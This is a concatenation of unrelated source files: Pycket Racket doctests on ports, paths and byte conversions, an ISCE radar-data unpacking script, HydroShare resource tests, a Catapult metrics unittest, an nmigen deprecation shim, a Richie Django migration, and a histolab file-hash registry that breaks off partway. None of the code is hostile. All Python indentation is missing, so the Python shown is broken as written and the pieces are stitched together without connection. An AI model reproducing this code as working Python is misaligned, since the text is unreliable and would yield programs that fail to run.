'`(1)
> (rs "`(,1)")
'`(,1)
> (rs "\\"1\\"")
"1"
> (rs "\\"'abc\\"")
"'abc"
> (rs "\\"hello jed\\"")
"hello jed"
> (rs "\\"abc.123\\"")
"abc.123"
> (rs "\\"\\t\\n\\"")
"\\t\\n"
> (rs "ab;cd")
'ab
> (rs "12;cd\\n")
12
> (define s2 (open-input-string "12;\\n34"))
> (read s2)
12
> (read s2)
34
> (rs "#'()")
'(syntax ())
> (rs "#`()")
'(quasisyntax ())
> (rs "#`(#,x)")
'(quasisyntax ((unsyntax x)))
> (rs "#`(#,@x)")
'(quasisyntax ((unsyntax-splicing x)))
"""
def test_close_port(doctest):
"""
> (define sp (open-input-string "(apples 42 day)"))
> (port-closed? sp)
#f
> (close-input-port sp)
> (port-closed? sp)
#t
> (define op (open-output-string))
> (port-closed? op)
#f
> (close-output-port op)
> (port-closed? op)
#t
"""
def test_port_read_peek(doctest):
r"""
> (define sp (open-input-string "(apples 42 day)"))
> (peek-char sp)
#\(
> (peek-char sp 5)
#\e
> (read-char sp)
#\(
> (define bp (open-input-bytes #"(apples 42 day)"))
> (peek-byte bp)
40
> (peek-byte bp 5)
101
> (read-byte bp)
40
> (define usp (open-input-string "\u4F60\u597D,\u4E16\u754C"))
> (peek-byte usp)
228
> (peek-char usp)
#\u4F60
> (peek-char usp)
#\u4F60
> (read-char usp)
#\u4F60
> (read-char usp)
#\u597D
> (read-char usp)
#\,
"""
def test_peek_bug(tmpdir):
from pycket.prims.input_output import open_infile
from pycket import values_string
s = "abc\ndef\nghi"
f = tmpdir.join("example.txt")
f.write(s)
w_n = values_string.W_String.fromstr_utf8(str(f))
w_p = open_infile(w_n, "r")
for c in s:
c1 = w_p.peek()
assert c1 == c
c2 = w_p.read(1)
assert c2 == c
c = w_p.peek()
assert c == ''
c = w_p.read(1)
assert c == ''
w_p.close()
def test_listp(doctest):
"""
> (list? '(1 2))
#t
> (list? (cons 1 (cons 2 '())))
#t
> (list? (cons 1 2))
#f
> (list? 1)
#f
"""
def test_format(doctest):
r"""
> (format "a")
"a"
E (format "a~a")
E (format "a" 1)
> (format "~~~n~%")
"~\n\n"
> (format "abc~adef~aghi" 1 2)
"abc1def2ghi"
"""
def test_procedure_closure_contents_eq(doctest):
r"""
! (define (f x) (lambda () x))
! (define a "abc")
! (define (g x) (lambda () (g x)))
! (set! f (lambda (x) (lambda () x)))
! (set! g (lambda (x) (lambda () (g x))))
> (procedure-closure-contents-eq? (f a) (f a))
#t
> (procedure-closure-contents-eq? (f a) (f "abc"))
#t
> (procedure-closure-contents-eq? (f 1) (f 1))
#t
> (procedure-closure-contents-eq? (f a) (f "c"))
#f
> (procedure-closure-contents-eq? (g a) (g a))
#t
> (procedure-closure-contents-eq? (g a) ((g a)))
#t
> (procedure-closure-contents-eq? (g a) (((g a))))
#t
> (procedure-closure-contents-eq? (g a) (((g "c"))))
#f
"""
def test_list_ref(doctest):
"""
> (list-ref '(1 2 3) 0)
1
> (list-ref '(1 2 3) 1)
2
> (list-ref '(1 2 3) 2)
3
"""
def test_unsafe_undefined(doctest):
"""
! (require '#%unsafe)
! (struct p (x y) #:mutable #:transparent)
> (check-not-unsafe-undefined 1 'a)
1
E (check-not-unsafe-undefined unsafe-undefined 'a)
> (check-not-unsafe-undefined/assign 1 'a)
1
E (check-not-unsafe-undefined/assign unsafe-undefined 'a)
> (chaperone-struct-unsafe-undefined 1)
1
> (let* ([x (p 1 2)]
[y (chaperone-struct-unsafe-undefined x)]
[_ (set-p-y! y 3)]
[z (p-y y)])
z)
3
"""
def test_dynamic_wind(doctest):
"""
> (dynamic-wind (lambda () 1) (lambda () 2) (lambda () 3))
2
"""
def test_dynamic_wind2():
m = run_mod(
"""
#lang pycket
(require racket/control)
(define acc 0)
(define v
(let/cc k
(dynamic-wind
(lambda () (set! acc (+ acc 1)))
(lambda () (set! acc (+ acc 1)) 42)
(lambda () (set! acc (+ acc 1))))))
""")
acc = m.defs[values.W_Symbol.make("acc")]
v = m.defs[values.W_Symbol.make("v")]
assert isinstance(acc, values.W_Cell)
acc = acc.get_val()
assert isinstance(v, values.W_Fixnum) and v.value == 42
assert isinstance(acc, values.W_Fixnum) and acc.value == 3
def test_dynamic_wind3():
m = run_mod(
"""
#lang pycket
(require racket/control)
(define val
(let/ec k0
(let/ec k1
(dynamic-wind
void
(lambda () (k0 'cancel))
(lambda () (k1 'cancel-canceled))))))
""")
val = m.defs[values.W_Symbol.make("val")]
assert val is values.W_Symbol.make("cancel-canceled")
def test_dynamic_wind4():
m = run_mod(
"""
#lang pycket
(require racket/control)
(define val
(let* ([x (make-parameter 0)]
[l null]
[add (lambda (a b)
(set! l (append l (list (cons a b)))))])
(let ([k (parameterize ([x 5])
(dynamic-wind
(lambda () (add 1 (x)))
(lambda () (parameterize ([x 6])
(let ([k+e (let/cc k (cons k void))])
(add 2 (x))
((cdr k+e))
(car k+e))))
(lambda () (add 3 (x)))))])
(parameterize ([x 7])
(let/cc esc
(k (cons void esc)))))
l))
(define equal (equal? val '((1 . 5) (2 . 6) (3 . 5) (1 . 5) (2 . 6) (3 . 5))))
""")
val = m.defs[values.W_Symbol.make("val")]
equal = m.defs[values.W_Symbol.make("equal")]
assert equal is values.w_true
def test_bytes_conversions():
m = run_mod(
"""
#lang pycket
(define a (real->floating-point-bytes 1 8 #f))
(define b (integer-bytes->integer a #f))
""")
a = values.W_Symbol.make("a")
b = values.W_Symbol.make("b")
vb = m.defs[b]
assert isinstance(vb, values.W_Fixnum) and vb.value == 4607182418800017408
def test_build_path(doctest):
"""
> (path->string (build-path "/usr/bin" "bash"))
"/usr/bin/bash"
> (path->string (build-path "/usr" "bin" 'up "bash"))
"/usr/bin/../bash"
> (path->string (build-path "/usr" "bin" 'same "bash"))
"/usr/bin/./bash"
> (path->string (build-path "/"))
"/"
> (path->string (build-path "/" "etc"))
"/etc"
"""
def test_path_to_complete_path():
m = run_mod(
"""
#lang pycket
(define p (path->complete-path "test.rkt"))
""")
p = m.defs[values.W_Symbol.make("p")]
cwd = os.getcwd()
assert isinstance(p, values.W_Path)
full = cwd + "/" + "test.rkt"
assert full == p.path
def test_explode_path(doctest):
# we use kernel's map to save loading
"""
! (require '#%kernel)
! (define-values (unpath) (lambda (p) (if (path? p) (path->string p) p)))
> (map path->string (explode-path "/home/spenser/src/pycket"))
'("/" "home" "spenser" "src" "pycket")
> (map unpath (explode-path "/home/spenser/src/pycket/.././."))
'("/" "home" "spenser" "src" "pycket" up same same)
> (map unpath (explode-path "home/spenser/src/pycket/.././."))
'("home" "spenser" "src" "pycket" up same same)
> (map unpath (explode-path "a//b"))
'("a" "b")
> (map unpath (explode-path "a//"))
'("a")
"""
assert doctest
def test_file_size(doctest):
"""
> (file-size "./pycket/test/sample_file.txt")
256
"""
assert doctest
def test_andmap(doctest):
"""
! (require (only-in '#%kernel andmap))
> (andmap even? '())
#t
> (andmap even? '(1))
#f
> (andmap even? '(2))
#t
> (andmap even? '(1 2 3 4 5 6 7 8 9))
#f
> (andmap even? '(2 4 6 8))
#t
> (andmap odd? '())
#t
> (andmap odd? '(1))
#t
> (andmap odd? '(2))
#f
> (andmap odd? '(1 2 3 4 5 6 7 8 9))
#f
> (andmap odd? '(2 4 6 8))
#f
"""
def test_ormap(doctest):
"""
! (require (only-in '#%kernel ormap))
> (ormap even? '())
#f
> (ormap even? '(1))
#f
> (ormap even? '(2))
#t
> (ormap even? '(1 2 3 4 5 6 7 8 9))
#t
> (ormap even? '(2 4 6 8))
#t
> (ormap odd? '())
#f
> (ormap odd? '(1))
#t
> (ormap odd? '(2))
#f
> (ormap odd? '(1 2 3 4 5 6 7 8 9))
#t
> (ormap odd? '(2 4 6 8))
#f
"""
@pytest.mark.skip(reason="we only do correlated")
def test_syntax_to_datum(doctest):
"""
> (syntax->datum #'a)
'a
> (syntax->datum #'(x . y))
'(x . y)
> (syntax->datum #'#(1 2 (+ 3 4)))
'#(1 2 (+ 3 4))
> (syntax->datum #'#&"hello world")
'#&"hello world"
;;;;; XXX: Ordering problem?
;> (syntax->datum #'#hash((imperial . "yellow") (festival . "green")))
;'#hash((festival . "green") (imperial . "yellow"))
> (syntax->datum #'#(point 3 4))
'#(point 3 4)
> (syntax->datum #'3)
3
> (syntax->datum #'"three")
"three"
> (syntax->datum #'#t)
#t
"""
@skip
def test_syntax_e(doctest):
"""
> (syntax-e #'a)
'a
> (let ((s (syntax-e #'(x . y))))
(and (pair? s) (syntax? (car s)) (syntax? (cdr s))))
;'(#<syntax:11:0 x> . #<syntax:11:0 y>)
#t
> (let ((s (syntax-e #'#(1 2 (+ 3 4)))))
(and (list? s) (syntax? (list-ref s 1))))
;'#(#<syntax:12:0 1> #<syntax:12:0 2> #<syntax:12:0 (+ 3 4)>)
#t
> (let ((s (syntax-e #'#&"hello world")))
(and (box? s) (syntax? (unbox s))))
;'#&#<syntax:13:0 "hello world">
#t
;;;;; XXX: Ordering problem?
;> (syntax-e #'#hash((imperial . "yellow") (festival . "green")))
;'#hash((festival . #<syntax:14:0 "green">) (imperial . #<syntax:14:0 "yellow">))
> (let ((s (syntax-e #'#(point 3 4))))
(and (vector? s) (syntax? (vector-ref s 1))))
;'#(#<syntax:15:0 point> #<syntax:15:0 3> #<syntax:15:0 4>)
#t
> (syntax-e #'3)
3
> (syntax-e #'"three")
"three"
> (syntax-e #'#t)
#t
"""
def test_relative_path(doctest):
"""
> (relative-path? "/home/spenser")
#f
> (relative-path? "~/bin/racket")
#t
> (relative-path? "./../bin/racket")
#t
> (relative-path? (string->path "/home/spenser"))
#f
> (relative-path? (string->path "~/bin/racket"))
#t
> (relative-path? (string->path "./../bin/racket"))
#t
"""
def test_continuation_prompt_functions(doctest):
u"""
! (define tag (make-continuation-prompt-tag))
! (define (escape v) (abort-current-continuation tag (lambda () v)))
> (call-with-continuation-prompt (λ () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag)
0
> (+ 1 (call-with-continuation-prompt (lambda () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag))
1
> (call-with-continuation-prompt (λ () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag (λ (x) (+ 10 (x))))
10
> (+ 1 (call-with-continuation-prompt (lambda () (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (+ 1 (escape 0)))))))) tag (λ (x) (+ (x) 10))))
11
"""
def test_continuation_prompt_available(doctest):
u"""
! (define tag (make-continuation-prompt-tag))
! (define tag2 (make-continuation-prompt-tag))
> (call-with-continuation-prompt (λ () (continuation-prompt-available? tag)) tag)
#t
> (call-with-continuation-prompt (λ () (continuation-prompt-available? tag)) tag2)
#f
"""
def test_raise_exception(doctest):
u"""
! (require racket/base)
! (define-struct (my-exception exn:fail:user) ())
> (with-handlers ([number? (lambda (n) (+ n 5))]) (raise 18 #t))
23
> (with-handlers ([my-exception? (lambda (e) #f)]) (+ 5 (raise (make-my-exception "failed" (current-continuation-marks)))))
#f
> (with-handlers ([number? (λ (n) (+ n 5))]) (with-handlers ([string? (λ (n) (string-append n " caught ya"))]) (raise 8)))
13
"""
def test_ctype_basetype(doctest):
u"""
! (require '#%foreign)
> (ctype-basetype #f)
#f
> (ctype-basetype _int8)
'int8
> (ctype-basetype _uint32)
'uint32
> (ctype-basetype (make-ctype _int8 #f #f))
'int8
> (ctype-basetype (make-ctype _int8 (λ (x) x) #f))
_int8
"""
def test_ctype_sizeof(doctest):
u"""
! (require '#%foreign)
> (equal? (ctype-sizeof _int8) (ctype-sizeof (make-ctype _int8 #f #f)))
#t
"""
def test_procedure_result_arity(doctest):
"""
! (define-struct node (x y z))
> (procedure-result-arity car)
1
> (procedure-result-arity cdr)
1
> (procedure-result-arity node-x)
1
"""
def test_string_to_keyword(doctest):
"""
> (eq? (string->keyword "hello") (values '#:hello))
#t
> (eq? (string->keyword "muffin button") (values '#:|muffin button|))
#t
"""
def test_bytes_to_path_element(doctest):
"""
> (path->string (bytes->path-element (string->bytes/locale "spenser")))
"spenser"
"""
def test_bytes_to_immutable_bytes(doctest):
"""
> (immutable? (bytes->immutable-bytes (bytes 1 2 3)))
#t
> (equal? (bytes->immutable-bytes (bytes 1 2 3)) (bytes 1 2 3))
#t
"""
def test_bytes_to_list(doctest):
"""
> (bytes->list #"Apple")
'(65 112 112 108 101)
"""
def test_split_path(doctest):
"""
! (define-values (base1 name1 must-be-dir1) (split-path "abc/def"))
! (define-values (base2 name2 must-be-dir2) (split-path "./abc/def"))
! (define-values (base3 name3 must-be-dir3) (split-path ".."))
! (define-values (base4 name4 must-be-dir4) (split-path "."))
! (define-values (base5 name5 must-be-dir5) (split-path "foo"))
! (define-values (base6 name6 must-be-dir6) (split-path "bcd/"))
! (define-values (base7 name7 must-be-dir7) (split-path "./"))
! (define-values (base8 name8 must-be-dir8) (split-path "/etc"))
! (define-values (base9 name9 must-be-dir9) (split-path "/"))
! (define-values (base10 name10 must-be-dir10) (split-path "/etc/"))
> base1
(string->path "abc/")
> name1
(string->path "def")
> must-be-dir1
#f
> base2
(string->path "./abc/")
> name2
(string->path "def")
> must-be-dir2
#f
> base3
'relative
> name3
'up
> must-be-dir3
#t
> base4
'relative
> name4
'same
> must-be-dir4
#t
> base5
'relative
> name5
(string->path "foo")
> must-be-dir5
#f
> base6
'relative
> name6
(string->path "bcd")
> must-be-dir6
#t
> base7
'relative
> name7
'same
> must-be-dir7
#t
> base8
(string->path "/")
> name8
(string->path "etc")
> must-be-dir8
#f
> base9
#f
> name9
(string->path "/")
> must-be-dir9
#t
> base10
(string->path "/")
> name10
(string->path "etc")
> must-be-dir10
#t
> (let-values ([(a b c) (split-path (build-path "b" (quote up)))])
(list (path->string a) b c))
'("b/" up #t)
"""
def test_fail_user_simple(doctest):
"""
E (raise-user-error "foo")
"""
def test_integer_to_integer_bytes(doctest):
r"""
> (integer->integer-bytes 0 2 #t)
#"\0\0"
> (integer->integer-bytes -1 2 #t)
#"\377\377"
> (integer->integer-bytes 65535 2 #f)
#"\377\377"
> (integer->integer-bytes 0 2 #t #t)
#"\0\0"
> (integer->integer-bytes -1 2 #t #t)
#"\377\377"
> (integer->integer-bytes -256 2 #t #t)
#"\377\0"
> (integer->integer-bytes -255 2 #t #t)
#"\377\1"
> (integer->integer-bytes 511 2 #t #t)
#"\1\377"
> (integer->integer-bytes 513 2 #f #f)
#"\1\2"
> (integer->integer-bytes 0 2 #t #f)
#"\0\0"
> (integer->integer-bytes -1 2 #t #f)
#"\377\377"
> (integer->integer-bytes 65535 2 #f #f)
#"\377\377"
> (integer->integer-bytes 511 2 #t #f)
#"\377\1"
> (integer->integer-bytes -255 2 #t #f)
#"\1\377"
> (integer->integer-bytes 258 2 #f #t)
#"\1\2"
> (integer->integer-bytes 0 4 #t)
#"\0\0\0\0"
> (integer->integer-bytes -1 4 #t)
#"\377\377\377\377"
> (integer->integer-bytes 4294967295 4 #f)
#"\377\377\377\377"
> (integer->integer-bytes 0 4 #t #t)
#"\0\0\0\0"
> (integer->integer-bytes -1 4 #t #t)
#"\377\377\377\377"
> (integer->integer-bytes 4294967295 4 #f #t)
#"\377\377\377\377"
> (integer->integer-bytes -16777216 4 #t #t)
#"\377\0\0\0"
> (integer->integer-bytes 255 4 #t #t)
#"\0\0\0\377"
> (integer->integer-bytes 1835103348 4 #t #t)
#"matt"
> (integer->integer-bytes 1953784173 4 #t #f)
#"matt"
> (integer->integer-bytes 0 8 #t #t)
#"\0\0\0\0\0\0\0\0"
> (integer->integer-bytes -1 8 #t #f)
#"\377\377\377\377\377\377\377\377"
> (integer->integer-bytes 4294967295 8 #t #f)
#"\377\377\377\377\0\0\0\0"
> (integer->integer-bytes -4294967296 8 #t #f)
#"\0\0\0\0\377\377\377\377"
> (integer->integer-bytes 8589934591 8 #t #f)
#"\377\377\377\377\1\0\0\0"
> (integer->integer-bytes -4294967295 8 #t #f)
#"\1\0\0\0\377\377\377\377"
> (integer->integer-bytes 0 8 #t #f)
#"\0\0\0\0\0\0\0\0"
> (integer->integer-bytes -1 8 #t #f)
#"\377\377\377\377\377\377\377\377"
> (integer->integer-bytes -4294967296 8 #t #t)
#"\377\377\377\377\0\0\0\0"
> (integer->integer-bytes 4294967295 8 #t #t)
#"\0\0\0\0\377\377\377\377"
> (integer->integer-bytes -4294967295 8 #t #t)
#"\377\377\377\377\0\0\0\1"
> (integer->integer-bytes 8589934591 8 #t #t)
#"\0\0\0\1\377\377\377\377"
"""
# Tests for bigint
# > (integer->integer-bytes 18446744073709551615 8 #f #f)
# #"\377\377\377\377\377\377\377\377"
# > (integer->integer-bytes 18446744073709551615 8 #f #f)
# #"\377\377\377\377\377\377\377\377"
def test_integer_bytes_to_integer(doctest):
r"""
> (integer-bytes->integer #"\0\0" #t)
0
> (integer-bytes->integer #"\377\377" #t)
-1
> (integer-bytes->integer #"\377\377" #f)
65535
> (integer-bytes->integer #"\0\0" #t #t)
0
> (integer-bytes->integer #"\377\377" #t #t)
-1
> (integer-bytes->integer #"\377\377" #f #t)
65535
> (integer-bytes->integer #"\377\0" #t #t)
-256
> (integer-bytes->integer #"\377\1" #t #t)
-255
> (integer-bytes->integer #"\1\377" #t #t)
511
> (integer-bytes->integer #"\1\2" #f #f)
513
> (integer-bytes->integer #"\0\0" #t #f)
0
> (integer-bytes->integer #"\377\377" #t #f)
-1
> (integer-bytes->integer #"\377\377" #f #f)
65535
> (integer-bytes->integer #"\377\1" #t #f)
511
> (integer-bytes->integer #"\1\377" #t #f)
-255
> (integer-bytes->integer #"\1\2" #f #t)
258
> (integer-bytes->integer #"\0\0\0\0" #t)
0
> (integer-bytes->integer #"\377\377\377\377" #t)
-1
> (integer-bytes->integer #"\377\377\377\377" #f)
4294967295
> (integer-bytes->integer #"\0\0\0\0" #t #t)
0
> (integer-bytes->integer #"\377\377\377\377" #t #t)
-1
> (integer-bytes->integer #"\377\377\377\377" #f #t)
4294967295
> (integer-bytes->integer #"\377\0\0\0" #t #t)
-16777216
> (integer-bytes->integer #"\0\0\0\377" #t #t)
255
> (integer-bytes->integer #"\0\0\0\0" #t #f)
0
> (integer-bytes->integer #"\377\377\377\377" #t #f)
-1
> (integer-bytes->integer #"\377\377\377\377" #f #f)
4294967295
> (integer-bytes->integer #"\377\0\0\1" #t #f)
16777471
> (integer-bytes->integer #"\0\0\0\377" #t #f)
-16777216
> (integer-bytes->integer #"\1\0\0\377" #t #f)
-16777215
> (integer-bytes->integer #"matt" #t #t)
1835103348
> (integer-bytes->integer #"matt" #t #f)
1953784173
> (integer-bytes->integer #"\0\0\0\0\0\0\0\0" #t #t)
0
> (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #t #f)
-1
> (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #f #f)
18446744073709551615
> (integer-bytes->integer #"\377\377\377\377\0\0\0\0" #t #f)
4294967295
> (integer-bytes->integer #"\0\0\0\0\377\377\377\377" #t #f)
-4294967296
> (integer-bytes->integer #"\377\377\377\377\1\0\0\0" #t #f)
8589934591
> (integer-bytes->integer #"\1\0\0\0\377\377\377\377" #t #f)
-4294967295
> (integer-bytes->integer #"\0\0\0\0\0\0\0\0" #t #f)
0
> (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #t #f)
-1
> (integer-bytes->integer #"\377\377\377\377\377\377\377\377" #f #f)
18446744073709551615
> (integer-bytes->integer #"\377\377\377\377\0\0\0\0" #t #t)
-4294967296
> (integer-bytes->integer #"\0\0\0\0\377\377\377\377" #t #t)
4294967295
> (integer-bytes->integer #"\377\377\377\377\0\0\0\1" #t #t)
-4294967295
> (integer-bytes->integer #"\0\0\0\1\377\377\377\377" #t #t)
8589934591
"""
def test_logger_operations(doctest):
"""
> (logger-name (make-logger 'example))
'example
"""
def test_path_less_than(doctest):
"""
> (path<? (string->path "a") (string->path "b"))
#t
> (path<? (string->path "") (string->path ""))
#f
> (path<? (string->path "a") (string->path ""))
#f
> (path<? (string->path "") (string->path "a"))
#t
> (path<? (string->path "/home/spenser") (string->path "/home"))
#f
> (path<? (string->path "/home") (string->path "/home/spenser"))
#t
"""
def test_string_to_bytes_latin1(doctest):
u"""
! (define b (bytes->string/latin-1 (bytes 254 211 209 165)))
> (string->bytes/latin-1 b)
#"\376\323\321\245"
> (bytes->string/latin-1 (string->bytes/latin-1 b))
"þÓÑ¥"
"""
def test_current_seconds(doctest):
"""
> (exact-integer? (current-seconds))
#t
"""
def test_true_object(doctest):
"""
! (require '#%kernel)
> (true-object? #t)
#t
> (true-object? #f)
#f
> (true-object? 3)
#f
"""
def test_char_foldcase(doctest):
ur"""
> (char-foldcase #\A)
#\a
> (char-foldcase #\Σ)
#\σ
> (char-foldcase #\ς)
#\σ
> (char-foldcase #\space)
#\space
"""
def test_procedure_specialize(doctest):
"""
! (define f (let ([g 5]) (lambda (x) (+ g x))))
> (f 1)
6
> ((procedure-specialize f) 1)
6
"""
def test_symbol_less_than(doctest):
"""
> (symbol<? 'a 'b)
#t
> (symbol<? 'a 'a)
#f
> (symbol<? 'b 'a)
#f
"""
|
contrib/stack/stripmapStack/unpackFrame_ROIPAC_raw.py | vincentschut/isce2 | 1,133 | 11096104 | <reponame>vincentschut/isce2
#!/usr/bin/env python3
import isce
from isceobj.Sensor import createSensor
import shelve
import argparse
import glob
from isceobj.Util import Poly1D
from isceobj.Planet.AstronomicalHandbook import Const
import os
from mroipac.dopiq.DopIQ import DopIQ
import copy
def cmdLineParse():
'''
Command line parser.
'''
parser = argparse.ArgumentParser(description='Unpack raw data and store metadata in pickle file.')
parser.add_argument('-i','--input', dest='rawfile', type=str,
required=True, help='Input ROI_PAC file')
parser.add_argument('-r','--hdr', dest='hdrfile', type=str,
required=True, help='Input hdr (orbit) file')
parser.add_argument('-o', '--output', dest='slcdir', type=str,
required=True, help='Output data directory')
return parser.parse_args()
def unpack(rawname, hdrname, slcname):
'''
Unpack raw to binary file.
'''
if not os.path.isdir(slcname):
os.mkdir(slcname)
date = os.path.basename(slcname)
obj = createSensor('ROI_PAC')
obj.configure()
obj._rawFile = rawname
obj._hdrFile = hdrname
obj.output = os.path.join(slcname, date+'.raw')
print(obj._rawFile)
print(obj._hdrFile)
print(obj.output)
obj.extractImage()
obj.frame.getImage().renderHdr()
#####Estimate doppler
dop = DopIQ()
dop.configure()
img = copy.deepcopy(obj.frame.getImage())
img.setAccessMode('READ')
dop.wireInputPort('frame', object=obj.frame)
dop.wireInputPort('instrument', object=obj.frame.instrument)
dop.wireInputPort('image', object=img)
dop.calculateDoppler()
dop.fitDoppler()
fit = dop.quadratic
coef = [fit['a'], fit['b'], fit['c']]
print(coef)
obj.frame._dopplerVsPixel = [x*obj.frame.PRF for x in coef]
pickName = os.path.join(slcname, 'raw')
with shelve.open(pickName) as db:
db['frame'] = obj.frame
if __name__ == '__main__':
'''
Main driver.
'''
inps = cmdLineParse()
if inps.slcdir.endswith('/'):
inps.slcdir = inps.slcdir[:-1]
unpack(inps.rawfile, inps.hdrfile, inps.slcdir)
|
hs_core/tests/api/native/test_set_public.py | hydroshare/hydroshare | 178 | 11096115 | <reponame>hydroshare/hydroshare
import os
import tempfile
import shutil
from unittest import TestCase, skip
from django.contrib.auth.models import Group, User
from django.core.exceptions import ValidationError
from hs_core.hydroshare import resource
from hs_core.models import GenericResource
from hs_core.testing import MockIRODSTestCaseMixin
from hs_core import hydroshare
class TestCreateResource(MockIRODSTestCaseMixin, TestCase):
def setUp(self):
super(TestCreateResource, self).setUp()
self.tmp_dir = tempfile.mkdtemp()
self.hs_group, _ = Group.objects.get_or_create(name='Hydroshare Author')
# create a user
self.user = hydroshare.create_account(
'<EMAIL>',
username='mytestuser',
first_name='some_first_name',
last_name='some_last_name',
superuser=False,
groups=[self.hs_group]
)
# create files
file_one = os.path.join(self.tmp_dir, "test1.txt")
file_one_write = open(file_one, "w")
file_one_write.write("Putting something inside")
file_one_write.close()
# open files for read and upload
self.file_one = open(file_one, "rb")
self.res = resource.create_resource(
'GenericResource',
self.user,
'My Test Resource',
files=(self.file_one,)
)
def tearDown(self):
super(TestCreateResource, self).tearDown()
self.file_one.close()
shutil.rmtree(self.tmp_dir)
self.res.delete()
self.user.uaccess.delete()
self.user.delete()
self.hs_group.delete()
User.objects.all().delete()
Group.objects.all().delete()
GenericResource.objects.all().delete()
def test_resource_setAVU_and_getAVU(self):
""" test that setAVU and getAVU work predictably """
self.res.setAVU("foo", "bar")
self.assertEqual(self.res.getAVU("foo"), "bar")
self.res.setAVU("foo", "cat")
self.assertEqual(self.res.getAVU("foo"), "cat")
@skip("TODO: was not running before python3 upgrade")
def test_set_public_and_set_discoverable(self):
""" test that resource.set_public and resource.set_discoverable work properly. """
# default resource was constructed to be publishable
self.assertTrue(self.res.can_be_public_or_discoverable)
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
self.res.set_public(False)
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
self.res.set_discoverable(True)
self.assertTrue(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
self.res.set_discoverable(False)
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.res.set_public(True)
self.assertTrue(self.res.raccess.discoverable)
self.assertTrue(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'true')
self.res.set_discoverable(False)
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
# now try some things that won't work
# first make the resource unacceptable to be discoverable
self.res.metadata.title.value = ''
self.res.metadata.title.save()
self.assertFalse(self.res.can_be_public_or_discoverable)
with self.assertRaises(ValidationError):
self.res.set_public(True)
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
with self.assertRaises(ValidationError):
self.res.set_discoverable(True)
@skip("TODO: was not running before python3 upgrade")
def test_update_public_and_discoverable(self):
""" test that resource.update_public_and_discoverable works properly. """
self.assertTrue(self.res.can_be_public_or_discoverable)
self.res.update_public_and_discoverable()
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
# intentionally and greviously violate constraints
self.res.raccess.discoverable = True
self.res.raccess.public = True
self.res.raccess.save()
self.res.setAVU('isPublic', True)
# There's a problem now
self.assertFalse(self.res.can_be_public_or_discoverable)
self.assertEqual(self.res.getAVU('isPublic'), 'true')
# update should correct the problem
self.res.update_public_and_discoverable()
self.assertFalse(self.res.raccess.discoverable)
self.assertFalse(self.res.raccess.public)
self.assertEqual(self.res.getAVU('isPublic'), 'false')
|
tracing/tracing/metrics/discover_unittest.py | tingshao/catapult | 2,151 | 11096130 | # Copyright (c) 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from tracing.metrics import discover
class MetricsDiscoverUnittest(unittest.TestCase):
def testMetricsDiscoverEmpty(self):
self.assertFalse(discover.DiscoverMetrics([]))
def testMetricsDiscoverNonEmpty(self):
self.assertEquals(['sampleMetric'], discover.DiscoverMetrics(
['/tracing/metrics/sample_metric.html']))
def testMetricsDiscoverMultipleMetrics(self):
self.assertGreater(
len(discover.DiscoverMetrics(
['/tracing/metrics/all_metrics.html'])), 1)
|
nmigen/compat/sim/__init__.py | psumesh/nmigen | 528 | 11096150 | from amaranth.compat.sim import *
from amaranth.compat.sim import __all__
import warnings
warnings.warn("instead of nmigen.compat.sim, use amaranth.compat.sim",
DeprecationWarning, stacklevel=2)
|
src/richie/apps/courses/migrations/0012_add_translation_model_for_licence_fields.py | leduong/richie | 174 | 11096151 | # Generated by Django 2.2.9 on 2020-01-02 15:07
import django.db.models.deletion
from django.db import migrations, models
import parler.models
import richie.apps.core.fields.multiselect
class Migration(migrations.Migration):
dependencies = [("courses", "0011_deprecate_untranslated_licence_fields")]
operations = [
migrations.CreateModel(
name="LicenceTranslation",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"language_code",
models.CharField(
db_index=True, max_length=15, verbose_name="Language"
),
),
("name", models.CharField(max_length=200, verbose_name="name")),
("content", models.TextField(default="", verbose_name="content")),
(
"master",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="translations",
to="courses.Licence",
),
),
],
options={
"verbose_name": "Licence translation",
"db_table": "richie_licence_translation",
"unique_together": {("language_code", "master")},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
)
]
|
histolab/data/_registry.py | Toughee/histolab | 149 | 11096172 | <reponame>Toughee/histolab
# flake8: noqa
# in legacy datasets we need to put our sample data within the data dir
legacy_datasets = ["cmu_small_region.svs"]
# Registry of datafiles that can be downloaded along with their SHA256 hashes
# To generate the SHA256 hash, use the command
# openssl sha256 filename
registry = {
"histolab/broken.svs": "b1325916876afa17ad5e02d2e7298ee883e758ed25369470d85bc0990e928e11",
"histolab/kidney.png": "5c6dc1b9ae10a2865302d9c8eda360362ec47732cb3e9766c38ed90cb9f4c371",
"data/cmu_small_region.svs": "ed92d5a9f2e86df67640d6f92ce3e231419ce127131697fbbce42ad5e002c8a7",
"aperio/JP2K-33003-1.svs": "6205ccf75a8fa6c32df7c5c04b7377398971a490fb6b320d50d91f7ba6a0e6fd",
"aperio/JP2K-33003-2.svs": "1a13cef86b55b51127cebd94a1f6069f7de494c98e3e708640d1ce7181d9e3fd",
